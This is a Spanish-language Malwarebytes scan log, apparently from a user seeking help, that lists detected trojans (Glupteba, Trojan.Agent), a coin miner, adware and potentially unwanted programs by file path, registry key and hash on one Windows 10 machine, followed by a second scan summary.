PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\Config.xml, Sin acciones por parte del usuario, 942, 259506, , , , , 974EA9D68DC7E7B940FDC7A4131D0F1B, B8F58BE8E9CC3BBE1F6D31AC13F24F7AC3922B608364B8E61DDB76478D468A85
Adware.Linkury, C:\ProgramData\Logic Cramble\Config.json, Sin acciones por parte del usuario, 431, 431817, , , , , 960F48F4FE0A806409071D4DF64571BC, 71C5405CF7E47FE5AA3D654671FB82901092E4EDEBBF625A83B43D143C5A7503
Adware.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\NOAH.DAT, Sin acciones por parte del usuario, 3765, 404865, 1.0.29005, , ame, , 1B08356FD51B93AF992EE31082B4D99E, FDC6D507F367A35119F1C38FADE310550FE61DBCAD8EDE5A3491510C910B1697
Adware.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\MD.XML, Sin acciones por parte del usuario, 3765, 404866, 1.0.29005, , ame, , FFB9BF1A895AC00778EB2C27941240FB, 856E979BC8B8BDD37312FE3CA0C89AF832886591F8EAB1D0F582F89D53DAB3FC
Adware.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\MAIN.DAT, Sin acciones por parte del usuario, 3765, 442900, 1.0.29005, , ame, , E7C61CED4E61C5CA4262517BA94B248F, 1E507B62A8910E267786128F44313ABED8E2F6AE6B10A4645E40F61BE153EE3F
Adware.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\Namair.tst, Sin acciones por parte del usuario, 3765, 404871, 1.0.29005, , ame, , 69E9FC42B84F4144329D2CFAA7A9BC31, BB958948B90DFE1F4C73FE630275E7D7278F68E7722DFE970CD1DFB8B6BEE032
Adware.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\Runron.tst, Sin acciones por parte del usuario, 3765, 404871, 1.0.29005, , ame, , 1FB12FBD435C0E8B319110E956034A3F, 2E81C4C39A079731D6BCA287FAEA3433F258BFCD1B39BC716805AD7731D505C1
Adware.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\AGENT.DAT, Sin acciones por parte del usuario, 3765, 404872, 1.0.29005, , ame, , FDF7221A7644E4CC7B4FD800CC2D4143, 73D0AF7873BB26A4BBCAA45574980464DF7D562A76A163DB87F21C91C671CA27
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Sin acciones por parte del usuario, 501, 455564, 1.0.29005, , ame, , 6512AE7C9F36206F6433F78296102419, 6B9468EFEE35A8454A7FB395F43E5BDD14DF918437661846D7D6EC199BA08883
Adware.Linkury, C:\USERS\HETITOR\APPDATA\LOCAL\installer.dat, Sin acciones por parte del usuario, 431, 715618, 1.0.29005, , ame, , A9B70F7DC958A3F9A85FF3E7E3BC1D0F, BB4991C18FD0901C2E8868F8C808C4CCFF8A9674E4BDEACD0BE08BA1DDDCAF65
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\TASKS\CSRSS, Sin acciones por parte del usuario, 504, 781233, 1.0.29005, , ame, , F1146D7F3DB17F14D7748D31F981FE04, 0CAC7C2AD061A49BDA266899D5541B8960B5A59560838398AF3AA22441ADBD5F
Trojan.Agent, C:\USERS\HETITOR\APPDATA\LOCAL\LOBBY.DAT, Sin acciones por parte del usuario, 501, 712637, 1.0.29005, , ame, , 1B08356FD51B93AF992EE31082B4D99E, FDC6D507F367A35119F1C38FADE310550FE61DBCAD8EDE5A3491510C910B1697
Trojan.Agent, C:\USERS\HETITOR\APPDATA\LOCAL\APPLICATIONHOSTING.DAT, Sin acciones por parte del usuario, 501, 712640, 1.0.29005, , ame, , B43E89EAF3D060A3F2E60348F4A53BEE, F106FB595E23C2DB999A9246A9C97B40E0FBC5E6ED53BD13B3C2CE9EE90FD1AE
Adware.Linkury, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\installer.dat, Sin acciones por parte del usuario, 431, 715618, 1.0.29005, , ame, , A9B70F7DC958A3F9A85FF3E7E3BC1D0F, BB4991C18FD0901C2E8868F8C808C4CCFF8A9674E4BDEACD0BE08BA1DDDCAF65
RiskWare.BitCoinMiner, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\WUP\WUP.EXE, Sin acciones por parte del usuario, 874, 512161, 1.0.29005, CC9E64F89567CD09EDC9CBCE, dds, 00866951, BD4B03E6127A34ECAB890F6EB1546634, 52C8CFF981E5D541E4B2930A4A5E0B0A495D62C8237E91538D94C03A048DD51D
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\TIME TRIGGER TASK, Sin acciones por parte del usuario, 3731, 601202, 1.0.29005, , ame, , D7EB0B99539143B60B23FC30396468C2, 8EB296681F155F972495E5216F3655334393329AC791850032517B5204B276DB
PUP.Optional.CloudNet, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, Sin acciones por parte del usuario, 5935, 448845, 1.0.29005, , ame, , 42590BF90D24947FF89F56C7FBC84443, FB3EACF6FE157A0EF26A943130EFA0C7961656519C95F09911691250311BE79F
PUP.Optional.CloudNet, C:\Users\Hetitor\AppData\Local\Temp\csrss\wup\xarch\MSRDriver.sys, Sin acciones por parte del usuario, 5935, 448845, , , , , 0C0195C48B6B8582FA6F6373032118DA, 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
PUP.Optional.CloudNet, C:\Users\Hetitor\AppData\Local\Temp\csrss\wup\xarch\wup.exe, Sin acciones por parte del usuario, 5935, 448845, , , , , 69292742888F4F3828988EACB474431D, BE0108B777BE7C095B49D3B8D1CDF20DA2189A24E98C01F1EC4CC2988ACA0E29
PUP.Optional.CloudNet, C:\Users\Hetitor\AppData\Local\Temp\csrss\collectchromefingerprint.exe, Sin acciones por parte del usuario, 5935, 448845, , , , , 7235A6EC6ED27CEA9D08C301E7246622, 1F77FEB3AB86FC7615711497163C4853AE40A0A45ABA4CB441A5EAE6519415BA
PUP.Optional.CloudNet, C:\Users\Hetitor\AppData\Local\Temp\csrss\u20200626.exe, Sin acciones por parte del usuario, 5935, 448845, , , , , 1460BBEC2D23D6F83A7A3AC83AA8B097, 453C5A6C2AE3F25D9A00EC492738EFC934C499628464D1B296BC84EF8FAF62C2
PUP.Optional.CloudNet, C:\Users\Hetitor\AppData\Local\Temp\csrss\w20200508.exe, Sin acciones por parte del usuario, 5935, 448845, , , , , E5DE177193E034C5CE13BFB2C4F76AB2, D63DE1CB96648EA9FA44E22045EE5F8E74D7CFD2D97CBC9848857ABE379CF085
Generic.Malware/Suspicious, C:\USERS\HETITOR\APPDATA\LOCAL\DOMCOM.BIN, Sin acciones por parte del usuario, 0, 392686, 1.0.29005, , shuriken, , F991FA15A754E9FB91D4947D7BF45049, E935128EC6BD632639764AE49A986644FEE43977FC9455D10A0B8CDFEDC3A967
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\DRIVERS\MONITOR_WIN10_X64.SYS, Sin acciones por parte del usuario, 3833, 580520, , , , , 988DABDCF990B134B0AC1E00512C30C4, E4A7DA2CF59A4A21FC42B611DF1D59CAE75051925A7DDF42BF216CC1A026EADB
Adware.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\CONFIG.XML, Sin acciones por parte del usuario, 3765, 404859, 1.0.29005, , ame, , 3C1059989B0E249AF6E00E2A567A41EB, 691D449973F93B46CE1DF12554EA28657021848EEE803D8A56AAEA2EC2DBBE00
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\VOYASOLLAMS\FF.HP, Sin acciones por parte del usuario, 198, 380106, 1.0.29005, , ame, , EF1E03C044328DE3081A01927B2002BE, 0422ED183BC166F6ACBD30FB86DA4E1D75726AA54ABD52813DADD808E3F51C33
PUP.Optional.Linkury.Generic, C:\ProgramData\Voyasollams\ff.NT, Sin acciones por parte del usuario, 198, 380106, , , , , 94DB58FA951386423B951D72DAE379A4, 425F51ECA456EA058646D886CADDFD3F02F651584FDA66847C4727D46F483518
PUP.Optional.Linkury.Generic, C:\ProgramData\Voyasollams\snp.sc, Sin acciones por parte del usuario, 198, 380106, , , , , 8EBDDFAC6586461582AD51A1D745B2FC, 6A5778DF84C8FA861E6AB7CD64AB56D3BFD65817AB4BD4FE0A984EC28CBBCB0F
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\MSVCP140.DLL, Sin acciones por parte del usuario, 3869, 820423, 1.0.29005, , ame, , 109F0F02FD37C84BFC7508D4227D7ED5, 334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Sin acciones por parte del usuario, 3833, 380352, , , , , 83DCB31162E4DE2DDA1BFD4C0FE10CC2, 01A8E526637B46B07E58F8FF01E0770F7E7E5A479BBEDC942303C80BB6E57465
Malware.AI.4016147590, C:\WINDOWS\OINSTALL.EXE, Sin acciones por parte del usuario, 1000000, 0, 1.0.29005, 2EB62E8D89A9757CEF618C86, dds, 00866951, 10939A654CA5F2EB7A18CCB86F7D8CC2, B78D7730EBFA5DDB05EA0EAD4CF15A8EBEA85D4DAB2202EAFCB10B1ECE2561DB
PUP.Optional.TotalAV, C:\USERS\HETITOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\TOTALAV.LNK, Sin acciones por parte del usuario, 9094, 795103, 1.0.29005, , ame, , 223FA310337AEA92A26B8C6E44C64F22, DC81AD20D170D6007BD0D1A1F97E28D8B0E18766732C2091FFA6AB5E0686A625
PUP.Optional.TotalAV, C:\USERS\PUBLIC\DESKTOP\TOTALAV.LNK, Sin acciones por parte del usuario, 9094, 795103, 1.0.29005, , ame, , BE70AAC0B4E72411DB2FCD2AF8B317D3, 870023C44BCD4832528970B223C45E211CD018645FC10E43BCED424FAD0D0785
Trojan.Agent, C:\WINDOWS\3B6C0724DAF1.SYS, Sin acciones por parte del usuario, 501, 847709, 1.0.29005, A697E5FD48BD62DEFA400643, dds, 00866951, 83B77957421FF0595B96ADA634DF885E, BD85FFA911BC6D8948AB27270592FF056A77F97AE2F45E4464C18157840FD1AB
Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Sin acciones por parte del usuario, 15124, 444922, 1.0.29005, , ame, , 4453F09795BC472CB0B0213E51E746AB, 6F4AD71C0D17B62E980BE243E87215FA5683A96BE2FE591F60BC115F7689DBA5
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\HARDWARELIB.DLL, Sin acciones por parte del usuario, 3833, 396386, 1.0.29005, , ame, , A67D6EBEC7666AED4108D9615089AB37, 41806D21AA6FB79F4DB0ED990022FD015DDB39BA0E39FAD789DCEB6AA22E5CF0
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\CPUIDINTERFACE.DLL, Sin acciones por parte del usuario, 3833, 396386, 1.0.29005, , ame, , DD09C7D9A62E423CAA85307E667AD466, 5F4DA8F9AED5DB374E66B1B0D46A5CD8BA424ABC2FCD50AFE6777D9E479A827B
PUP.Optional.TotalAV, C:\PROGRAM FILES (X86)\TOTALAV\SECURITYSERVICE.EXE, Sin acciones por parte del usuario, 9094, 849702, 1.0.29005, , ame, , 01307989F1BECED2C070B1BC4BBDB69E, 66A89E4D47D72C95D86E8369616AA69B4198942B92DC88F00EE99ABF82BD8080
Adware.Linkury.TskLnk, C:\USERS\HETITOR\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Sin acciones por parte del usuario, 15124, 444923, 1.0.29005, , ame, , 5FD87A0A3F275DF68FB6F3DE1A295FF9, 1FE6EC64AAA3E884206BFF8F047AA27FA145EC7E9424653E5E223FD78736E021
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\TASKS\ScheduledUpdate, Sin acciones por parte del usuario, 504, 781223, 1.0.29005, , ame, , 62CE6891B10F331AC5DCC1472DF0FA25, F3221A0D69F8BC719431430206EC82D06B2FEB1F6BB0A48E5DAEB9E2BD34B337
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\FREEBL3.DLL, Sin acciones por parte del usuario, 3869, 820418, 1.0.29005, , ame, , EF2834AC4EE7D6724F255BEAF527E635, A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
PUP.Optional.AdvancedSystemCare, C:\WINDOWS\SYSTEM32\TASKS\ASC_SkipUac_Hetitor, Sin acciones por parte del usuario, 3833, 396386, , , , , 73D91B3DFE3C40F68A3513528E7E5514, 8B813F93C9A0248EF371FE337B5779595F9FCAC846F9C12CB5BD69FAEC32F344
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASC.EXE, Sin acciones por parte del usuario, 3833, 396386, 1.0.29005, , ame, , 5117312462D8FDF750D86225ED0ACD5E, 305224B56D1F6AD23623F5E7316834996AC1609D893C7256B85F5B0CE5E5AB08
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\MOZGLUE.DLL, Sin acciones por parte del usuario, 3869, 820422, 1.0.29005, , ame, , 8F73C08A9660691143661BF7332C3C27, 3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\VCRUNTIME140.DLL, Sin acciones por parte del usuario, 3869, 820419, 1.0.29005, , ame, , 7587BF9CB4147022CD5681B015183046, C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\NSS3.DLL, Sin acciones por parte del usuario, 3869, 820421, 1.0.29005, , ame, , BFAC4E3C5908856BA17D41EDCD455A51, E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
Adware.WizzMonetize, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\VBC0MKK4MA2\LGRZFNUMYXK.EXE, Sin acciones por parte del usuario, 12514, 827982, 1.0.29005, 10FF5C9F1C005425FB7E4C28, dds, 00866951, 84A28876C0BF17B6F35DC479281CF9FE, F25E7C5E77679733141190A5E189F4D6AC58D9947CF82065EE119339FA9D2F45
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\SOFTOKN3.DLL, Sin acciones por parte del usuario, 3869, 820420, 1.0.29005, , ame, , A2EE53DE9167BF0D6C019303B7CA84E5, 43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
PUP.Optional.TotalAV, C:\PROGRAM FILES (X86)\TOTALAV\PASSWORDEXTENSION.WIN.EXE, Sin acciones por parte del usuario, 9094, 849702, 1.0.29005, , ame, , 86BA53F403253988ED1F0092C46E6069, 2BF1747BC9C9014CCEA61F9DC8738C220EDDBA7053C8D83178A5D4F2A6199BF7
Malware.AI.3046703087, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\JFIAG_GG.EXE, Sin acciones por parte del usuario, 1000000, 0, 1.0.29005, C0264A863E170605B598FFEF, dds, 00866951, A6279EC92FF948760CE53BBA817D6A77, 8B581869BF8944A8E0AA169ADEA2A4AFE47434123DA477132880AFF6A5032181
Adware.WizzMonetize, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\5HAXNDMMCU1\NX45LWGYX4P.EXE, Sin acciones por parte del usuario, 12514, 827982, 1.0.29005, 10FF5C9F1C005425FB7E4C28, dds, 00866951, 84A28876C0BF17B6F35DC479281CF9FE, F25E7C5E77679733141190A5E189F4D6AC58D9947CF82065EE119339FA9D2F45
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb, Sin acciones por parte del usuario, 435, 519968, , , , , E4220B10D32849DDC74E2CC0D6412C0C, CAE0165B9D288E42331CD91BC811A4B2E8BAF24B3AB39117511785FB02B4DDBC
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000060.log, Sin acciones por parte del usuario, 435, 519968, , , , , 04464692BE22C63F6295FF0B5A2C36F6, CC6F848C9E4AB71A88F9B20494F362335A2E2B23A86DB6D8E1EE4E880DA8F4F7
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000062.ldb, Sin acciones por parte del usuario, 435, 519968, , , , , 0DBA84F3F28068B8578763326AEE9614, D399A96B7FB8F00F139CAD18E3C343BF2B6E06C047C193F9D93BF0033406170C
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT, Sin acciones por parte del usuario, 435, 519968, , , , , 46295CAC801E5D4857D09837238A6394, 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK, Sin acciones por parte del usuario, 435, 519968, , , , , ,
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG, Sin acciones por parte del usuario, 435, 519968, , , , , 29F4B32703CA21BCA0D01FB074FCE141, 704819B05DDC2B080091B01DA422C8C7FA2EFB279886B82BD0EC93D4F273A0E9
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old, Sin acciones por parte del usuario, 435, 519968, , , , , 7413CD0A3F87E255188DCCFB34D6AA9E, 37828E0D7289338BFFE65334506CC63E47B9C152AAF327F8C66F224BD62D2403
PUP.Optional.SonicSearch, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001, Sin acciones por parte del usuario, 435, 519968, , , , , 7A76C30D6442926D78A1BB724E64AABF, 914CCE835186BFBDF7F122B9644C40F5F819BF52DFF60CCBE59015744B017377
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 435, 519968, 1.0.29005, , ame, , A3DE02F7103DA008604D06034F7C1D97, 66EEC27D7490A74A117199DC87516B351B60AE6D0658EE5C96B7FC15DF8415FB
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 297, 454688, 1.0.29005, , ame, , A3DE02F7103DA008604D06034F7C1D97, 66EEC27D7490A74A117199DC87516B351B60AE6D0658EE5C96B7FC15DF8415FB
PUP.Optional.DiskFixer, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\JQDOZAE4WF2.EXE, Sin acciones por parte del usuario, 2967, 758704, 1.0.29005, , ame, , 2FF701F08A9BF6CDE708AD068A96F08B, F384C7CE84F7784C5A8A4612F440FA2EE797C669129FFE0CE2FC89062BF7A2C8
Malware.AI.1380671057, C:\WINDOWS\TEMP\O15-16LICSETUP.EXE, Sin acciones por parte del usuario, 1000000, 0, 1.0.29005, 32D6D9AC32A1A13A524B5E51, dds, 00866951, 582DC84142A4EF5388D0E2C987782398, 89752E3334EE08F8AD020B0F898600106E67CD034C4881F0DC2299D2A591D0B6
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, 198, 454805, 1.0.29005, , ame, , A3DE02F7103DA008604D06034F7C1D97, 66EEC27D7490A74A117199DC87516B351B60AE6D0658EE5C96B7FC15DF8415FB
Sector físico: 0
(No hay elementos maliciosos detectados)
WMI: 0
(No hay elementos maliciosos detectados)
(end)
un segundo escaneo arrojó lo siguiente: Malwarebytes
-Detalles del registro-
Fecha del análisis: 25/8/20
Hora del análisis: 8:23
Archivo de registro: 6b3cb064-e6c5-11ea-8468-2cf05d3fbd97.json
-Información del software-
Versión: 4.2.0.82
Versión de los componentes: 1.0.1025
Versión del paquete de actualización: 1.0.29029
Licencia: Prueba
-Información del sistema-
SO: Windows 10 (Build 18362.1016)
CPU: x64
Sistema de archivos: NTFS
Usuario: DESKTOP-7O23KFE\Hetitor
-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 316978
Amenazas detectadas: 43
Amenazas en cuarentena: 0
Tiempo transcurrido: 2 min, 28 seg
-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar
-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)
Módulo: 0
(No hay elementos maliciosos detectados)
Clave del registro: 8
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinDefender, Sin acciones por parte del usuario, 501, 455564, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Sin acciones por parte del usuario, 504, 781223, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B2C5B258-7042-4216-8B57-E601084A0631}, Sin acciones por parte del usuario, 504, 781223, , , , , ,
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{B2C5B258-7042-4216-8B57-E601084A0631}, Sin acciones por parte del usuario, 504, 781223, , , , , ,
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\3B6C0724DAF1, Sin acciones por parte del usuario, 501, 847709, , , , , ,
PUP.Optional.AdvancedSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ASC_SkipUac_Hetitor, Sin acciones por parte del usuario, 3833, 396386, , , , , ,
PUP.Optional.AdvancedSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{429AFDFD-4EA8-403B-971B-2E7E3C59CC61}, Sin acciones por parte del usuario, 3833, 396386, , , , , ,
PUP.Optional.AdvancedSystemCare, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{429AFDFD-4EA8-403B-971B-2E7E3C59CC61}, Sin acciones por parte del usuario, 3833, 396386, , , , , ,
Valor del registro: 1
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WINDEFENDER|IMAGEPATH, Sin acciones por parte del usuario, 501, 428246, 1.0.29029, , ame, , ,
Datos del registro: 0
(No hay elementos maliciosos detectados)
Secuencia de datos: 0
(No hay elementos maliciosos detectados)
Carpeta: 3
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 198, 454805, , , , , ,
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 297, 454688, , , , , ,
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, Sin acciones por parte del usuario, 435, 519968, , , , , ,
Archivo: 31
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Sin acciones por parte del usuario, 501, 455564, 1.0.29029, , ame, , 6512AE7C9F36206F6433F78296102419, 6B9468EFEE35A8454A7FB395F43E5BDD14DF918437661846D7D6EC199BA08883
Adware.Linkury.TskLnk, C:\USERS\HETITOR\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Sin acciones por parte del usuario, 15125, 444923, 1.0.29029, , ame, , 5FD87A0A3F275DF68FB6F3DE1A295FF9, 1FE6EC64AAA3E884206BFF8F047AA27FA145EC7E9424653E5E223FD78736E021
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\TASKS\ScheduledUpdate, Sin acciones por parte del usuario, 504, 781223, 1.0.29029, , ame, , 62CE6891B10F331AC5DCC1472DF0FA25, F3221A0D69F8BC719431430206EC82D06B2FEB1F6BB0A48E5DAEB9E2BD34B337
Trojan.Agent, C:\WINDOWS\3B6C0724DAF1.SYS, Sin acciones por parte del usuario, 501, 847709, 1.0.29029, A697E5FD48BD62DEFA400643, dds, 00867499, 83B77957421FF0595B96ADA634DF885E, BD85FFA911BC6D8948AB27270592FF056A77F97AE2F45E4464C18157840FD1AB
Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Sin acciones por parte del usuario, 15125, 444922, 1.0.29029, , ame, , 4453F09795BC472CB0B0213E51E746AB, 6F4AD71C0D17B62E980BE243E87215FA5683A96BE2FE591F60BC115F7689DBA5
PUP.Optional.AdvancedSystemCare, C:\WINDOWS\SYSTEM32\TASKS\ASC_SkipUac_Hetitor, Sin acciones por parte del usuario, 3833, 396386, , , , , 73D91B3DFE3C40F68A3513528E7E5514, 8B813F93C9A0248EF371FE337B5779595F9FCAC846F9C12CB5BD69FAEC32F344
PUP.Optional.AdvancedSystemCare, E:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASC.EXE, Sin acciones por parte del usuario, 3833, 396386, 1.0.29029, , ame, , 5117312462D8FDF750D86225ED0ACD5E, 305224B56D1F6AD23623F5E7316834996AC1609D893C7256B85F5B0CE5E5AB08
PUP.Optional.TotalAV, C:\PROGRAM FILES (X86)\TOTALAV\SECURITYSERVICE.EXE, Sin acciones por parte del usuario, 9094, 849702, 1.0.29029, , ame, , 01307989F1BECED2C070B1BC4BBDB69E, 66A89E4D47D72C95D86E8369616AA69B4198942B92DC88F00EE99ABF82BD8080
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\VCRUNTIME140.DLL, Sin acciones por parte del usuario, 3869, 820419, 1.0.29029, , ame, , 7587BF9CB4147022CD5681B015183046, C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\FREEBL3.DLL, Sin acciones por parte del usuario, 3869, 820418, 1.0.29029, , ame, , EF2834AC4EE7D6724F255BEAF527E635, A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\SOFTOKN3.DLL, Sin acciones por parte del usuario, 3869, 820420, 1.0.29029, , ame, , A2EE53DE9167BF0D6C019303B7CA84E5, 43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\MOZGLUE.DLL, Sin acciones por parte del usuario, 3869, 820422, 1.0.29029, , ame, , 8F73C08A9660691143661BF7332C3C27, 3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
RiskWare.MisusedLegit.E, C:\PROGRAMDATA\NSS3.DLL, Sin acciones por parte del usuario, 3869, 820421, 1.0.29029, , ame, , BFAC4E3C5908856BA17D41EDCD455A51, E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
Malware.AI.1380671057, C:\WINDOWS\TEMP\O15-16LICSETUP.EXE, Sin acciones por parte del usuario, 1000000, 0, 1.0.29029, 32D6D9AC32A1A13A524B5E51, dds, 00867499, 582DC84142A4EF5388D0E2C987782398, 89752E3334EE08F8AD020B0F898600106E67CD034C4881F0DC2299D2A591D0B6
PUP.Optional.DiskFixer, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\JQDOZAE4WF2.EXE, Sin acciones por parte del usuario, 2967, 758704, 1.0.29029, , ame, , 2FF701F08A9BF6CDE708AD068A96F08B, F384C7CE84F7784C5A8A4612F440FA2EE797C669129FFE0CE2FC89062BF7A2C8
PUP.Optional.TotalAV, C:\PROGRAM FILES (X86)\TOTALAV\PASSWORDEXTENSION.WIN.EXE, Sin acciones por parte del usuario, 9094, 849702, 1.0.29029, , ame, , 86BA53F403253988ED1F0092C46E6069, 2BF1747BC9C9014CCEA61F9DC8738C220EDDBA7053C8D83178A5D4F2A6199BF7
Adware.WizzMonetize, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\5HAXNDMMCU1\NX45LWGYX4P.EXE, Sin acciones por parte del usuario, 12514, 827982, 1.0.29029, 10FF5C9F1C005425FB7E4C28, dds, 00867499, 84A28876C0BF17B6F35DC479281CF9FE, F25E7C5E77679733141190A5E189F4D6AC58D9947CF82065EE119339FA9D2F45
Adware.WizzMonetize, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\VBC0MKK4MA2\LGRZFNUMYXK.EXE, Sin acciones por parte del usuario, 12514, 827982, 1.0.29029, 10FF5C9F1C005425FB7E4C28, dds, 00867499, 84A28876C0BF17B6F35DC479281CF9FE, F25E7C5E77679733141190A5E189F4D6AC58D9947CF82065EE119339FA9D2F45
